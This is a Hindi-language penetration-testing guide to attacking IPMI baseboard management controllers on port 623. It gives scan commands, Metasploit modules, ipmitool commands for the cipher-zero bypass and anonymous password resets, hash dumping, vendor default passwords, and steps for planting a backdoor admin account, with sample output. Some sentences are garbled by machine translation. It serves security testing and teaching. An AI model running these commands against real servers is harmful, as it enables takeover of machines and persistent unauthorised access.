623/UDP/TCP - IPMI

मूल जानकारी

IPMI का अवलोकन

इंटेलिजेंट प्लेटफॉर्म मैनेजमेंट इंटरफेस (IPMI) कंप्यूटर सिस्टमों का दूरस्थ प्रबंधन और मॉनिटरिंग के लिए एक मानकीकृत दृष्टिकोण प्रदान करता है, ऑपरेटिंग सिस्टम या बिजली की स्थिति के बिना। यह प्रौद्योगिकी सिस्टम प्रशासकों को सिस्टम का दूरस्थ प्रबंधन करने की अनुमति देती है, जब वे बंद या प्रतिक्रियाशील भी होते हैं, और विशेष रूप से उपयोगी है:

• पूर्व-ओएस बूट कॉन्फ़िगरेशन

• पावर-ऑफ प्रबंधन

• सिस्टम विफलताओं से पुनर्प्राप्ति

IPMI तापमान, वोल्टेज, फैन की गति और पावर सप्लाई की मॉनिटरिंग करने में सक्षम है, साथ ही इन्वेंटरी जानकारी प्रदान करने, हार्डवेयर लॉग की समीक्षा करने और SNMP के माध्यम से अलर्ट भेजने में सक्षम है। इसके संचालन के लिए एक विद्युत स्रोत और एक LAN कनेक्शन आवश्यक हैं।

इंटेल द्वारा 1998 में पेश किए जाने के बाद, IPMI को कई विक्रेताओं द्वारा समर्थित किया गया है, दूरस्थ प्रबंधन क्षमताओं को बढ़ावा देते हुए, विशेष रूप से संस्करण 2.0 के सीरियल ओवर LAN के समर्थन के साथ। मुख्य घटक शामिल हैं:

• बेसबोर्ड प्रबंधन नियंत्रक (BMC): IPMI कार्यों के लिए मुख्य माइक्रो-नियंत्रक।

• संचार बसेस और इंटरफेस: आंतरिक और बाह्य संचार के लिए, जैसे ICMB, IPMB, और स्थानीय और नेटवर्क कनेक्शन के लिए विभिन्न इंटरफेस।

• IPMI मेमोरी: लॉग और डेटा सहेजने के लिए।

डिफ़ॉल्ट पोर्ट: 623/UDP/TCP (यह आम तौर पर UDP पर होता है लेकिन यह TCP पर भी चल सकता है)

गणना

खोज

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

आप पहचान कर सकते हैं संस्करण का उपयोग करके:

use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

IPMI सुरक्षा दोष

IPMI 2.0 के क्षेत्र में, एक महत्वपूर्ण सुरक्षा दोष को दान फार्मर ने खोज निकाला, साइफर प्रकार 0 के माध्यम से एक दुरुपयोग को उजागर किया गया। यह दोष, जिसे विस्तार से दस्तावेजीकृत किया गया है दान फार्मर के शोध, किसी भी पासवर्ड के साथ अनधिकृत पहुंच को संभव बनाता है यदि एक मान्य उपयोगकर्ता को लक्षित किया गया है। यह कमजोरी HP, Dell, और Supermicro जैसे निर्माताओं के विभिन्न BMCs पर पाई गई थी, जो सभी IPMI 2.0 कार्यान्वयनों में एक व्यापक समस्या का सुझाव देती है।

साइफर 0 के माध्यम से IPMI प्रमाणीकरण बायपास

इस दोष को पहचानने के लिए, निम्नलिखित Metasploit ऑक्जिलरी स्कैनर का उपयोग किया जा सकता है:

use auxiliary/scanner/ipmi/ipmi_cipher_zero

इस दोष का शोधन ipmitool के साथ संभव है, जैसा नीचे प्रदर्शित किया गया है, जिससे उपयोगकर्ता के पासवर्ड की सूचीकरण और संशोधन की अनुमति होती है:

apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

यह दुरुपयोग किसी भी मौजूदा उपयोक्ता के लिए नमकीन है जिससे नमकीन है नमकीन है (MD5 और SHA1) को पुनः प्राप्त करना। इस दुरुपयोग की परीक्षण के लिए, Metasploit एक मॉड्यूल प्रदान करता है:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

IPMI अनाम प्रमाणीकरण

बहुत से BMCs में डिफ़ॉल्ट कॉन्फ़िगरेशन "अनाम" एक्सेस की अनुमति देता है, जिसमें नल उपयोगकर्ता नाम और पासवर्ड स्ट्रिंग्स शामिल हैं। इस कॉन्फ़िगरेशन का उपयोग ipmitool का उपयोग करके नामित उपयोगकर्ता खातों के पासवर्ड रीसेट करने के लिए किया जा सकता है:

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword

सुपरमाइक्रो IPMI स्पष्ट-पाठ पासवर्ड

IPMI 2.0 में एक महत्वपूर्ण डिज़ाइन चयन के अनिवार्यता के कारण BMCs में प्रमाणीकरण के लिए स्पष्ट-पाठ पासवर्ड को स्टोर करना आवश्यक है। सुपरमाइक्रो के इन पासवर्ड को स्थानों में स्टोर करना जैसे कि /nv/PSBlock या /nv/PSStore महत्वपूर्ण सुरक्षा संबंधित चिंताओं को उठाता है:

cat /nv/PSBlock

सुपरमाइक्रो आईपीएमआई यूपीएनपी सुरक्षा उत्कृष्टता

सुपरमाइक्रो के आईपीएमआई फर्मवेयर में यूपीएनपी एसएसडीपी सुनने वाला श्रोत शामिल करना, विशेष रूप से यूडीपी पोर्ट १९०० पर, एक गंभीर सुरक्षा जोखिम लाता है। इंटेल एसडीके के यूपीएनपी डिवाइस संस्करण १.३.१ में कमियों, जैसा कि रैपिड७ की भेदभाव द्वारा विस्तार से वर्णित किया गया है, बीएमसी के लिए रूट एक्सेस की अनुमति देते हैं:

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

ब्रूट फोर्स

HP अपने Integrated Lights Out (iLO) उत्पाद के लिए निर्माण के दौरान डिफ़ॉल्ट पासवर्ड को यादृच्छिक बनाता है। यह अभ्यास अन्य निर्माताओं के साथ विपरीत है, जो स्थिर डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग करने की प्रवृत्ति रखते हैं। विभिन्न उत्पादों के लिए डिफ़ॉल्ट उपयोक्ता नाम और पासवर्ड का सारांश निम्नलिखित रूप में प्रदान किया गया है:

• HP Integrated Lights Out (iLO) अपने डिफ़ॉल्ट पासवर्ड के रूप में फैक्टरी यादृच्छिक 8-वर्णीय स्ट्रिंग का उपयोग करता है, जो एक उच्च सुरक्षा स्तर का प्रदर्शन करता है।

• Dell का iDRAC, IBM का IMM, और Fujitsu का Integrated Remote Management Controller जैसे उत्पाद सरल डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग करते हैं, जैसे कि "calvin", "PASSW0RD" (जिसमें शून्य है), और "admin"।

• इसी तरह, Supermicro IPMI (2.0), Oracle/Sun ILOM, और ASUS iKVM BMC भी सरल डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग करते हैं, जिनमें "ADMIN", "changeme", और "admin" उनके पासवर्ड के रूप में काम करते हैं।

BMC के माध्यम से होस्ट तक पहुंचना

बेसबोर्ड प्रबंधन नियंत्रक (BMC) का प्रशासनिक एक्सेस होस्ट के ऑपरेटिंग सिस्टम तक पहुंचने के लिए विभिन्न मार्ग खोलता है। एक सीधा दृष्टिकोण BMC के कीबोर्ड, वीडियो, माउस (KVM) कार्यक्षमता का शोधन करना है। इसे या तो init=/bin/sh का उपयोग करके GRUB के माध्यम से होस्ट को रीबूट करके एक रूट शैल में पहुंचा जा सकता है या एक रेस्क्यू डिस्क के रूप में सेट किए गए वर्चुअल सीडी-रॉम से बूट करके। ऐसे तरीके होस्ट के डिस्क का सीधा परिवर्तन करने की अनुमति देते हैं, जिसमें बैकडोर्स का सम्मिलन, डेटा निकासी, या सुरक्षा मूल्यांकन के लिए कोई आवश्यक कार्रवाई शामिल है। हालांकि, इसके लिए होस्ट को रीबूट करने की आवश्यकता है, जो एक महत्वपूर्ण दोष है। बिना रीबूट किए, चल रहे होस्ट तक पहुंचना अधिक जटिल है और होस्ट के कॉन्फ़िगरेशन के साथ भिन्न होता है। यदि होस्ट का भौतिक या सीरियल कंसोल लॉगड इन रहता है, तो इसे आसानी से BMC के KVM या सीरियल-ओवर-लैन (sol) कार्यक्षमताओं के माध्यम से ले लिया जा सकता है ipmitool के माध्यम से। साझा हार्डवेयर संसाधनों के शोधन की अन्वेषण करना, जैसे कि i2c बस और सुपर I/O चिप, एक क्षेत्र है जिसे अधिक जांच की मांग करता है।

होस्ट से BMC में बैकडोर्स डालना

एक BMC से लैंड करने पर, स्थानीय BMC इंटरफेस का उपयोग करके एक बैकडोर उपयोक्ता खाता डाला जा सकता है, सर्वर पर स्थायी उपस्थिति बनाते हुए। इस हमले के लिए ipmitool का मौजूद होना और BMC ड्राइवर समर्थन की सक्रियण की आवश्यकता है। निम्नलिखित कमांड दिखाते हैं कि कैसे होस्ट के स्थानीय इंटरफेस का उपयोग करके एक नया उपयोक्ता खाता BMC में डाला जा सकता है, जो प्रमाणीकरण की आवश्यकता को छोड़ देता है। यह तकनीक विभिन्न ऑपरेटिंग सिस्टमों के लिए लागू है, जिसमें लिनक्स, विंडोज, बीएसडी, और डॉस भी शामिल हैं।

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

• port:623

संदर्भ

• https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/